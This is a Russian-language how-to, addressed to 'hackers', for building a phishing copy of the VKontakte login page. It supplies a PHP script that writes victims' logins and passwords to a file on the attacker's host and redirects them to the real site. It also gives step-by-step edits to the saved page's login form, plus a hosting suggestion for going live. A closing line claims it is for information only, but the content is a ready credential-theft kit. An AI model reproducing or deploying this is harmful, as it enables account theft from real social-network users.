Привет, хакеры, в данной статье приведу пример создания фишингового сайта для социальной сети вконтакте.
Открываем браузер, заходим по адресу vk.com,
Жмем ПКМ => Сохранить как =>
Имя файла: index.html
Тип файла: Веб – страница полностью. Жмем кнопку "Сохранить".
Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его BLACK.php
Открываем блокнот и вставляем туда этот код.
<?
$Login = $_POST[zabor]; // Логин жертвы
$Pass = $_POST[‘zena’]; // Пароль жертвы
$log = fopen(“ups.php”,”a+”); //тут будут лежать пароли жертв
fwrite($log,”<br> $Login:$Pass \n”); //производим запись в ups.php
fclose($log); //закрывает ups.php
echo “<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’.../head></html>”;// перенаправляем жертву на http://vk.com
?>
Закрываем и сохраняем как BLACK.php
Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим <form, жмем enter.
Он найдет строчку:
<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”https://login.vk.com/?act=login”method=”POST”>
Меняем её на это:
<FORM name=”login” id=”quick_login_form” onsubmit=”if (vklogin) {return true} else {quick_login();return false;}” action=”BLACK.php” method=”POST”>
Дальше, смотрим чуть ниже и находим строчку:
<INPUT name=”email” id=”quick_email” onfocus=”show’quick_expire’)” type=”text”>
Меняем на это:
<INPUT name=”zabor” id=”quick_email” onfocus=”show(‘quick_expire’)”type=”text”>
Смотрим ниже и находим строчку:
<INPUT name=”pass” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>
Меняем:
<INPUT name=”zena” id=”quick_pass” onfocus=”show(‘quick_expire’)”type=”password”>
Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, находим закрывающийся тег </form>, вырезаем его и вставляем тут.
<DIV class=”button_blue button_wide”><BUTTON id=”quick_login_button”>Войти</BUTTON></form></DIV>
Сохраняем index.html, получилось два файла и одна папка. Дальше это дело нужно залить на хостинг.
Этим https://beget.com можно месяц бесплатно пользоваться, можно купить, 165 рублей.
Когда жертва зайдет на страничку фишинговую, введет «логин» и «пароль», создаться на хостинге файл, ups.php в нем и будут храниться учетные записи.
Статья написана исключительно в ознакомительных целях!